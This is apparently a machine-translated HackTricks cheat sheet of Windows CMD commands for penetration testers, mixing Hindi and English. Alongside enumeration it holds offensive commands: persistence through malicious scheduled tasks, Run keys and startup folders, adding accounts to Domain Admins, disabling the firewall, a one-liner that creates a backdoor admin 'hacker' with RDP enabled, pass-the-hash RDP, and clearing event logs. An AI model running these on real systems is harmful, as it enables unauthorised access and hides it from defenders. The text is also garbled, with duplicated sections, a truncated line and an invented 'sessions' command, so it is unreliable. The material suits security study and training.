110 KiB
पेंटेस्टर्स के लिए मूल विंडोज़ CMD
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप एक साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? सदस्यता योजनाएं की जांच करें!
- The PEASS Family की खोज करें, हमारा विशेष NFT संग्रह
- आधिकारिक PEASS & HackTricks swag प्राप्त करें
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे Twitter पर फ़ॉलो करें 🐦@carlospolopm.
- अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में PR जमा करके साझा करें।
सिस्टम जानकारी
संस्करण और पैच जानकारी
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname
DRIVERQUERY #3rd party driver vulnerable?
पर्यावरण
Basic CMD Commands for Pentesters
पेंटेस्टर्स के लिए मूल CMD कमांड्स
System Information
सिस्टम सूचना
-
systeminfo
: Displays detailed configuration information about a computer and its operating system. -
systeminfo
: एक कंप्यूटर और उसके ऑपरेटिंग सिस्टम के बारे में विस्तृत कॉन्फ़िगरेशन सूचना प्रदर्शित करता है।
Network Information
नेटवर्क सूचना
-
ipconfig
: Displays the IP configuration for all network interfaces on the computer. -
ipconfig
: कंप्यूटर पर सभी नेटवर्क इंटरफ़ेस के लिए आईपी कॉन्फ़िगरेशन प्रदर्शित करता है। -
netstat
: Displays active network connections and listening ports. -
netstat
: सक्रिय नेटवर्क कनेक्शन और सुन रहे पोर्ट प्रदर्शित करता है।
File and Directory Operations
फ़ाइल और निर्देशिका कार्य
-
dir
: Lists the files and folders in the current directory. -
dir
: मौजूदा निर्देशिका में फ़ाइलें और फ़ोल्डर्स की सूची बनाता है। -
cd
: Changes the current directory. -
cd
: मौजूदा निर्देशिका को बदलता है। -
mkdir
: Creates a new directory. -
mkdir
: एक नया निर्देशिका बनाता है। -
copy
: Copies one or more files from one location to another. -
copy
: एक से अधिक फ़ाइलें एक स्थान से दूसरे स्थान पर कॉपी करता है। -
move
: Moves one or more files from one location to another. -
move
: एक से अधिक फ़ाइलें एक स्थान से दूसरे स्थान पर ले जाता है। -
del
: Deletes one or more files. -
del
: एक से अधिक फ़ाइलें हटा देता है।
Process Management
प्रक्रिया प्रबंधन
-
tasklist
: Displays a list of currently running processes. -
tasklist
: वर्तमान में चल रही प्रक्रियाओं की सूची प्रदर्शित करता है। -
taskkill
: Terminates one or more running processes. -
taskkill
: एक से अधिक चल रही प्रक्रियाओं को समाप्त करता है।
User Management
उपयोगकर्ता प्रबंधन
-
net user
: Displays user account information. -
net user
: उपयोगकर्ता खाता सूचना प्रदर्शित करता है। -
net localgroup
: Displays local groups and their members. -
net localgroup
: स्थानीय समूह और उनके सदस्यों को प्रदर्शित करता है।
Service Management
सेवा प्रबंधन
-
sc query
: Displays the status of services. -
sc query
: सेवाओं की स्थिति प्रदर्शित करता है। -
sc start
: Starts a service. -
sc start
: एक सेवा शुरू करता है। -
sc stop
: Stops a service. -
sc stop
: एक सेवा रोकता है।
Registry Operations
रजिस्ट्री कार्य
-
reg query
: Displays the values of registry keys. -
reg query
: रजिस्ट्री कुंजी के मान प्रदर्शित करता है। -
reg add
: Adds a new registry key or value. -
reg add
: एक नई रजिस्ट्री कुंजी या मान जोड़ता है। -
reg delete
: Deletes a registry key or value. -
reg delete
: एक रजिस्ट्री कुंजी या मान हटा देता है।
Task Scheduler
कार्य संरचनाकार
-
schtasks
: Displays or configures scheduled tasks. -
schtasks
: निर्धारित कार्यों को प्रदर्शित या विन्यास करता है।
System Configuration
सिस्टम विन्यास
-
msconfig
: Launches the System Configuration utility. -
msconfig
: सिस्टम विन्यास उपयोगीता को लॉन्च करता है।
Network Configuration
नेटवर्क विन्यास
-
netsh
: Displays or modifies network configuration settings. -
netsh
: नेटवर्क विन्यास सेटिंग्स को प्रदर्शित या संशोधित करता है।
Firewall Configuration
फ़ायरवॉल विन्यास
-
netsh advfirewall
: Displays or modifies Windows Firewall configuration settings. -
netsh advfirewall
: विंडोज फ़ायरवॉल विन्यास सेटिंग्स को प्रदर्शित या संशोधित करता है।
Tasklist and Taskkill
Tasklist और Taskkill
-
tasklist /v
: Displays verbose information about running processes. -
tasklist /v
: चल रही प्रक्रियाओं के बारे में विस्तृत जानकारी प्रदर्शित करता है। -
taskkill /f /pid <PID>
: Terminates a process with a specific process ID. -
taskkill /f /pid <PID>
: एक विशिष्ट प्रक्रिया ID के साथ एक प्रक्रिया को समाप्त करता है।
Netstat
नेटस्टेट
-
netstat -ano
: Displays all active network connections and associated process IDs. -
netstat -ano
: सभी सक्रिय नेटवर्क कनेक्शन और संबंधित प्रक्रिया ID प्रदर्शित करता है।
Net User
नेट उपयोगकर्ता
-
net user <username>
: Displays information about a specific user account. -
net user <username>
: एक विशिष्ट उपयोगकर्ता खाते के बारे में जानकारी प्रदर्शित करता है।
Net Localgroup
नेट स्थानीय समूह
-
net localgroup
: Displays a list of local groups on the computer. -
net localgroup
: कंप्यूटर पर स्थानीय समूहों की सूची प्रदर्शित करता है।
Sc Query
Sc क्वेरी
-
sc query <service>
: Displays detailed information about a specific service. -
sc query <service>
: एक विशिष्ट सेवा के बारे में विस्तृत जानकारी प्रदर्शित करता है।
Sc Start
Sc स्टार्ट
-
sc start <service>
: Starts a specific service. -
sc start <service>
: एक विशिष्ट सेवा शुरू करता है।
Sc Stop
Sc स्टॉप
-
sc stop <service>
: Stops a specific service. -
sc stop <service>
: एक विशिष्ट सेवा रोकता है।
Reg Query
रेग क्वेरी
-
reg query <key>
: Displays the values of a specific registry key. -
reg query <key>
: एक विशिष्ट रजिस्ट्री कुंजी के मान प्रदर्शित करता है।
Reg Add
रेग जोड़ें
-
reg add <key>
: Adds a new registry key or value. -
reg add <key>
: एक नई रजिस्ट्री कुंजी या मान जोड़ता है।
Reg Delete
रेग हटाएं
-
reg delete <key>
: Deletes a specific registry key or value. -
reg delete <key>
: एक विशिष्ट रजिस्ट्री कुंजी या मान हटा देता है।
Schtasks
Schtasks
-
schtasks /query
: Displays a list of scheduled tasks. -
schtasks /query
: निर्धारित कार्यों की सूची प्रदर्शित करता है।
Msconfig
Msconfig
-
msconfig
: Launches the System Configuration utility. -
msconfig
: सिस्टम विन्यास उपयोगीता को लॉन्च करता है।
Netsh
नेटश
-
netsh interface ipv4 show config
: Displays the IPv4 configuration for all network interfaces. -
netsh interface ipv4 show config
: सभी नेटवर्क इंटरफ़ेस के लिए IPv4 कॉन्फ़िगरेशन प्रदर्शित करता है।
Netsh Advfirewall
नेटश एडवांसफ़ायरवॉल
-
netsh advfirewall show allprofiles
: Displays the configuration of Windows Firewall for all profiles. -
netsh advfirewall show allprofiles
: सभी प्रोफ़ाइल के लिए विंडोज फ़ायरवॉल का विन्यास प्रदर्शित करता है।
Tasklist और Taskkill
Tasklist and Taskkill
-
tasklist /v
: Displays verbose information about running processes. -
tasklist /v
: चल रही प्रक्रियाओं के बारे में विस्तृत जानकारी प्रदर्शित करता है। -
taskkill /f /pid <PID>
: Terminates a process with a specific process ID. -
taskkill /f /pid <PID>
: एक विशिष्ट प्रक्रिया ID के साथ एक प्रक्रिया को समाप्त करता है।
Netstat
नेटस्टेट
-
netstat -ano
: Displays all active network connections and associated process IDs. -
netstat -ano
: सभी सक्रिय नेटवर्क कनेक्शन और संबंधित प्रक्रिया ID प्रदर्शित करता है।
Net User
नेट उपयोगकर्ता
-
net user <username>
: Displays information about a specific user account. -
net user <username>
: एक विशिष्ट उपयोगकर्ता खाते के बारे में जानकारी प्रदर्शित करता है।
Net Localgroup
नेट स्थानीय समूह
-
net localgroup
: Displays a list of local groups on the computer. -
net localgroup
: कंप्यूटर पर स्थानीय समूहों की सूची प्रदर्शित करता है।
Sc Query
Sc क्वेरी
- **`sc query <service
set #List all environment variables
कुछ env variables को हाइलाइट करें:
- COMPUTERNAME: कंप्यूटर का नाम
- TEMP/TMP: टेम्प फ़ोल्डर
- USERNAME: आपका उपयोगकर्ता नाम
- HOMEPATH/USERPROFILE: होम निर्देशिका
- windir: C:\Windows
- OS: विंडोज ऑपरेटिंग सिस्टम
- LOGONSERVER: डोमेन कंट्रोलर का नाम
- USERDNSDOMAIN: DNS के साथ उपयोग करने के लिए डोमेन का नाम
- USERDOMAIN: डोमेन का नाम
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
माउंट किए गए डिस्क
Mounted disks are storage devices that have been connected to a computer system and made accessible for use. These disks can be physical devices such as hard drives or solid-state drives (SSDs), or they can be virtual disks created within a virtual machine environment.
माउंट किए गए डिस्क संग्रहण उपकरण हैं जो कंप्यूटर सिस्टम से जुड़े हुए हैं और उपयोग के लिए उपलब्ध कराए गए हैं। ये डिस्क भौतिक उपकरण जैसे हार्ड ड्राइव या सॉलिड स्टेट ड्राइव (SSD) हो सकते हैं, या वे वर्चुअल मशीन वातावरण में बनाए गए वर्चुअल डिस्क हो सकते हैं।
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
डिफेंडर
रीसायकल बिन
dir C:\$Recycle.Bin /s /b
प्रक्रियाएँ, सेवाएं और सॉफ़्टवेयर
Processes (प्रक्रियाएँ)
विंडोज़ में, प्रक्रियाएँ चल रही होती हैं जो सिस्टम के विभिन्न कार्यों को पूरा करने के लिए चलाई जाती हैं। यहां कुछ महत्वपूर्ण प्रक्रियाएँ हैं जिन्हें आपको जानना चाहिए:
tasklist
: यह आपको सिस्टम पर चल रही सभी प्रक्रियाओं की सूची प्रदान करेगा।taskkill
: इसका उपयोग किसी विशेष प्रक्रिया को बंद करने के लिए किया जाता है।
Services (सेवाएं)
सेवाएं विंडोज़ में चल रहे बैकग्राउंड प्रक्रियाओं को कहा जाता है जो सिस्टम के लिए विभिन्न कार्यों को संचालित करते हैं। यहां कुछ महत्वपूर्ण सेवाएं हैं जिन्हें आपको जानना चाहिए:
net start
: यह आपको सिस्टम पर चल रही सभी सेवाओं की सूची प्रदान करेगा।net stop
: इसका उपयोग किसी विशेष सेवा को बंद करने के लिए किया जाता है।
Software (सॉफ़्टवेयर)
सॉफ़्टवेयर विंडोज़ में चल रहे प्रोग्रामों को कहा जाता है जो उपयोगकर्ता के लिए विभिन्न कार्यों को पूरा करते हैं। यहां कुछ महत्वपूर्ण सॉफ़्टवेयर हैं जिन्हें आपको जानना चाहिए:
wmic product get name
: यह आपको सिस्टम पर स्थापित सभी सॉफ़्टवेयरों की सूची प्रदान करेगा।wmic product where name="Software Name" call uninstall
: इसका उपयोग किसी विशेष सॉफ़्टवेयर को अनइंस्टॉल करने के लिए किया जाता है।
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
डोमेन जानकारी
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
लॉग और घटनाएँ
Event Viewer
इवेंट व्यूअर विंडोज़ का एक टूल है जो विभिन्न घटनाओं के लॉग दर्शाता है। इसका उपयोग करके, आप विंडोज़ सिस्टम पर हुए घटनाओं को देख सकते हैं और उन्हें विश्लेषण कर सकते हैं। इवेंट व्यूअर को खोलने के लिए, eventvwr.msc
कमांड का उपयोग करें।
Windows Logs
विंडोज़ लॉग विभिन्न घटनाओं को रिकॉर्ड करते हैं जो सिस्टम पर होती हैं। इन लॉगों को देखकर, आप सिस्टम की स्थिति और सुरक्षा के बारे में जानकारी प्राप्त कर सकते हैं। कुछ महत्वपूर्ण लॉग निम्नलिखित हैं:
- Application Log: इसमें ऐप्लिकेशन द्वारा उत्पन्न होने वाली घटनाएँ रिकॉर्ड होती हैं।
- Security Log: इसमें सुरक्षा संबंधी घटनाएँ रिकॉर्ड होती हैं, जैसे लॉगिन और लॉगआउट का इतिहास।
- System Log: इसमें सिस्टम संबंधी घटनाएँ रिकॉर्ड होती हैं, जैसे विंडोज़ सेवा की शुरुआत और बंद होना।
PowerShell Logs
पावरशेल लॉग विंडोज़ पावरशेल कमांड्स के उपयोग को रिकॉर्ड करते हैं। इन लॉगों को देखकर, आप पावरशेल कमांड्स के उपयोग के बारे में जानकारी प्राप्त कर सकते हैं। कुछ महत्वपूर्ण पावरशेल लॉग निम्नलिखित हैं:
- PowerShell Operational Log: इसमें पावरशेल कमांड्स के उपयोग की जानकारी रिकॉर्ड होती है।
- PowerShell Script Block Logging: इसमें पावरशेल स्क्रिप्ट ब्लॉक के उपयोग की जानकारी रिकॉर्ड होती है।
- PowerShell Transcription: इसमें पावरशेल सत्र की जानकारी रिकॉर्ड होती है, जिसमें पावरशेल कमांड्स का इतिहास शामिल होता है।
Windows Event Forwarding
विंडोज़ इवेंट फ़ॉरवर्डिंग एक मेकेनिज़म है जो एक सिस्टम से दूसरे सिस्टम को घटनाओं की जानकारी भेजने की अनुमति देता है। इसका उपयोग करके, आप एक सेंट्रलाइज़्ड लोगिंग सिस्टम को बना सकते हैं जहां आप सभी सिस्टमों के लॉग को केंद्रीकृत रूप से देख सकते हैं।
Windows Event Log Clearing
विंडोज़ इवेंट लॉग क्लियर करने के लिए, आप wevtutil cl <log_name>
कमांड का उपयोग कर सकते हैं। इसका उपयोग करने से पहले, आपको विशेषाधिकार (Administrator) अनुमति होनी चाहिए। लॉग नाम के उदाहरण के लिए, wevtutil cl System
लिखें।
Windows Event Log Backup
विंडोज़ इवेंट लॉग की बैकअप करने के लिए, आप wevtutil epl <log_name> <backup_file>
कमांड का उपयोग कर सकते हैं। इसका उपयोग करने से पहले, आपको विशेषाधिकार (Administrator) अनुमति होनी चाहिए। लॉग नाम के उदाहरण के लिए, wevtutil epl System C:\backup.evtx
लिखें।
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
उपयोगकर्ता
उपयोगकर्ता जानना
वर्तमान में लॉग इन किए गए उपयोगकर्ता का नाम जानने के लिए निम्नलिखित कमांड का उपयोग करें:
whoami
उपयोगकर्ता के विवरण जानने के लिए निम्नलिखित कमांड का उपयोग करें:
net user <username>
उपयोगकर्ता के सभी विवरण जानने के लिए निम्नलिखित कमांड का उपयोग करें:
net user
नए उपयोगकर्ता बनाना
नए उपयोगकर्ता बनाने के लिए निम्नलिखित कमांड का उपयोग करें:
net user <username> <password> /add
उपयोगकर्ता को समूह में जोड़ने के लिए निम्नलिखित कमांड का उपयोग करें:
net localgroup <groupname> <username> /add
उपयोगकर्ता को हटाना
उपयोगकर्ता को हटाने के लिए निम्नलिखित कमांड का उपयोग करें:
net user <username> /delete
उपयोगकर्ता को समूह से हटाने के लिए निम्नलिखित कमांड का उपयोग करें:
net localgroup <groupname> <username> /delete
समूह
समूह जानना
सभी समूहों के नाम जानने के लिए निम्नलिखित कमांड का उपयोग करें:
net localgroup
समूह के सदस्यों को जानने के लिए निम्नलिखित कमांड का उपयोग करें:
net localgroup <groupname>
नया समूह बनाना
नया समूह बनाने के लिए निम्नलिखित कमांड का उपयोग करें:
net localgroup <groupname> /add
समूह को हटाना
समूह को हटाने के लिए निम्नलिखित कमांड का उपयोग करें:
net localgroup <groupname> /delete
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
# Other users looged
qwinsta #Anyone else logged in?
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
समूह
Groups are a way to organize users in Windows operating systems. Each user can belong to one or more groups, and groups can have certain permissions and access rights assigned to them. By default, Windows creates several built-in groups such as Administrators, Users, and Guests. These groups have different levels of privileges and can be used to control access to resources and perform various tasks on the system.
To view the groups on a Windows system, you can use the following command:
net localgroup
This command will display a list of all the local groups on the system. To view the members of a specific group, you can use the following command:
net localgroup <group_name>
Replace <group_name>
with the name of the group you want to view. This command will display a list of all the members in that group.
To create a new group, you can use the following command:
net localgroup <group_name> /add
Replace <group_name>
with the desired name for the new group. This command will create a new local group on the system.
To add a user to a group, you can use the following command:
net localgroup <group_name> <username> /add
Replace <group_name>
with the name of the group and <username>
with the username of the user you want to add. This command will add the specified user to the specified group.
To remove a user from a group, you can use the following command:
net localgroup <group_name> <username> /delete
Replace <group_name>
with the name of the group and <username>
with the username of the user you want to remove. This command will remove the specified user from the specified group.
Groups play a crucial role in managing user access and permissions in Windows systems, and understanding how to work with groups is essential for effective system administration and security.
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group
सत्र सूची
To list sessions in Hindi, use the following command:
sessions
This command will display a list of active sessions.
qwinsta
klist sessions
पासवर्ड नीति
A password policy is a set of rules and requirements that dictate how passwords should be created and managed within an organization. It is an important aspect of security as weak passwords can make systems vulnerable to unauthorized access. Here are some common elements of a password policy:
-
Password Length: The policy should specify a minimum password length, typically between 8 to 12 characters, to ensure passwords are not easily guessable.
-
Complexity: Passwords should be required to include a combination of uppercase and lowercase letters, numbers, and special characters. This helps increase the complexity and strength of the passwords.
-
Password Expiration: The policy should define a maximum password age, after which users are required to change their passwords. This helps prevent the use of old and potentially compromised passwords.
-
Password History: Users should be prevented from reusing their previous passwords. The policy should specify the number of unique passwords that must be used before a password can be reused.
-
Account Lockout: After a certain number of failed login attempts, user accounts should be locked to prevent brute-force attacks. The policy should define the lockout duration and the number of allowed attempts.
-
Password Storage: Passwords should be securely stored using strong encryption algorithms to protect them from unauthorized access.
Implementing a strong password policy can significantly enhance the security of an organization's systems and data. It is important to regularly review and update the policy to adapt to evolving security threats.
net accounts
प्रमाणपत्र
Credentials (प्रमाणपत्र) उपयोगकर्ता के पहचान को सत्यापित करने के लिए उपयोग होते हैं। ये जानकारी उपयोगकर्ता के अनुमति और पहचान को सत्यापित करने के लिए उपयोग होती है। प्रमाणपत्र उपयोगकर्ता के नाम और पासवर्ड को शामिल कर सकते हैं, जो उपयोगकर्ता को विशेष अनुमति देते हैं।
यहां कुछ प्रमाणपत्र के प्रकार हैं:
- उपयोगकर्ता नाम और पासवर्ड: यह प्रमाणपत्र उपयोगकर्ता के नाम और पासवर्ड को संग्रहित करता है। यह उपयोगकर्ता को विशेष अनुमति देता है और उसे सिस्टम में प्रवेश करने की अनुमति देता है।
- कुंजी फ़ाइलें: कुंजी फ़ाइलें एक फ़ाइल होती हैं जो उपयोगकर्ता के पासवर्ड को संग्रहित करती हैं। ये फ़ाइलें उपयोगकर्ता को सिस्टम में प्रवेश करने की अनुमति देती हैं।
- कुंजी वॉल्ट: कुंजी वॉल्ट एक सुरक्षित स्थान होता है जहां उपयोगकर्ता के पासवर्ड और अन्य प्रमाणपत्र संग्रहित किए जाते हैं। ये वॉल्ट उपयोगकर्ता को सिस्टम में प्रवेश करने की अनुमति देता है।
प्रमाणपत्रों की सुरक्षा बहुत महत्वपूर्ण है, क्योंकि अनुमति के बिना किसी भी सिस्टम में प्रवेश करना संभव नहीं होता है। इसलिए, प्रमाणपत्रों को सुरक्षित रखना और उनका उपयोग सत्यापित करने के लिए सुरक्षा सुनिश्चित करना आवश्यक है।
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
उपयोगकर्ताओं के साथ स्थायित्व
Persistence is a crucial aspect of maintaining access to a compromised system. By establishing persistence, an attacker ensures that their access remains even after a system reboot or user logout. In this section, we will explore various techniques for achieving persistence with user accounts.
Scheduled Tasks
Scheduled tasks are automated processes that run at specific times or intervals. Attackers can leverage scheduled tasks to maintain persistence on a compromised system. By creating a scheduled task that runs a malicious script or executable, an attacker can ensure that their code is executed periodically.
To create a scheduled task, you can use the schtasks
command. Here is an example:
schtasks /create /sc minute /mo 30 /tn "MaliciousTask" /tr "C:\path\to\malicious\script.bat"
This command creates a scheduled task named "MaliciousTask" that runs every 30 minutes and executes the specified batch script.
Registry Run Keys
Registry run keys are locations in the Windows Registry where programs can be configured to run automatically when a user logs in. By adding a malicious entry to a run key, an attacker can achieve persistence with a user account.
The following registry keys are commonly used for this purpose:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
To add a malicious entry to a run key, you can use the reg add
command. Here is an example:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MaliciousEntry" /t REG_SZ /d "C:\path\to\malicious\executable.exe"
This command adds a registry entry named "MaliciousEntry" to the current user's run key, which points to the specified executable.
Startup Folders
Startup folders are directories where programs can be placed to run automatically when a user logs in. By placing a malicious executable in a startup folder, an attacker can achieve persistence with a user account.
The following startup folders are commonly used for this purpose:
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup
To add a malicious executable to a startup folder, you can use the copy
command. Here is an example:
copy "C:\path\to\malicious\executable.exe" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup"
This command copies the malicious executable to the user's startup folder, ensuring that it runs automatically upon login.
By leveraging scheduled tasks, registry run keys, and startup folders, an attacker can establish persistence with user accounts, ensuring continued access to a compromised system.
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
नेटवर्क
इंटरफेस, रूट, पोर्ट, होस्ट और DNSCache
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
फ़ायरवॉल
फ़ायरवॉल एक सुरक्षा प्रणाली है जो नेटवर्क ट्रैफ़िक को नियंत्रित करने के लिए उपयोग होती है। यह एक बाधाओं की तरह काम करता है और अनधिकृत या अनचाहे नेटवर्क ट्रैफ़िक को रोकता है। फ़ायरवॉल नियंत्रण सूची (ACL) का उपयोग करके निर्दिष्ट नेटवर्क प्रोटोकॉल और पोर्टों के लिए अनुमति देता है या रोकता है। यह नेटवर्क सुरक्षा को सुनिश्चित करने में मदद करता है और अनधिकृत पहुंच से सुरक्षा प्रदान करता है।
फ़ायरवॉल के लिए कुछ महत्वपूर्ण आदेश हैं:
netsh advfirewall firewall show rule name=all
- सभी नियमों की सूची दिखाएँnetsh advfirewall firewall add rule name="Block IP" dir=in interface=any action=block remoteip=192.168.1.1
- निर्दिष्ट IP पते को रोकेंnetsh advfirewall firewall add rule name="Allow Port" dir=in action=allow protocol=TCP localport=80
- निर्दिष्ट पोर्ट को अनुमति देंnetsh advfirewall firewall delete rule name="Block IP"
- निर्दिष्ट नियम को हटाएँ
यहां उपरोक्त आदेशों का उपयोग करके आप फ़ायरवॉल को निर्दिष्ट नियमों के अनुसार कॉन्फ़िगर कर सकते हैं। यह आपको नेटवर्क सुरक्षा में मदद करेगा और अनधिकृत पहुंच से बचाएगा।
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
शेयर्स
शेयर्स एक विंडोज़ संगठनात्मक नेटवर्किंग कॉन्सेप्ट हैं जो एक कंप्यूटर पर फ़ोल्डर या ड्राइव को अन्य कंप्यूटरों के साथ साझा करने की अनुमति देते हैं। शेयर्स का उपयोग फ़ाइल और संसाधनों को साझा करने, नेटवर्क पर काम करने और संगठनात्मक संचालन को सुविधाजनक बनाने के लिए किया जाता है।
शेयर्स को निम्नलिखित तरीकों से एक्सेस किया जा सकता है:
- UNC पथ: UNC (Universal Naming Convention) पथ का उपयोग करके, जैसे
\\computername\sharename
, शेयर्स को एक्सेस किया जा सकता है। - ड्राइव मैपिंग: शेयर्स को एक्सेस करने के लिए एक ड्राइव लेटर के साथ उन्हें मैप किया जा सकता है, जैसे
net use X: \\computername\sharename
. - शेयर्ड फ़ोल्डर के रूप में माउंट करना: शेयर्ड फ़ोल्डर को एक लोकल फ़ोल्डर के रूप में माउंट किया जा सकता है, जिससे उपयोगकर्ता उसे सीधे एक्सेस कर सकते हैं।
शेयर्स को एक्सेस करने के लिए उपयोगकर्ता को उचित अनुमतियों की आवश्यकता होती है, जो उन्हें शेयर के मालिक द्वारा प्रदान की जाती हैं। शेयर्स की सुरक्षा को बढ़ाने के लिए, आप अनुमतियों को संशोधित कर सकते हैं, शेयर्स को पासवर्ड से सुरक्षित कर सकते हैं, और अन्य सुरक्षा उपाय अपना सकते हैं।
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
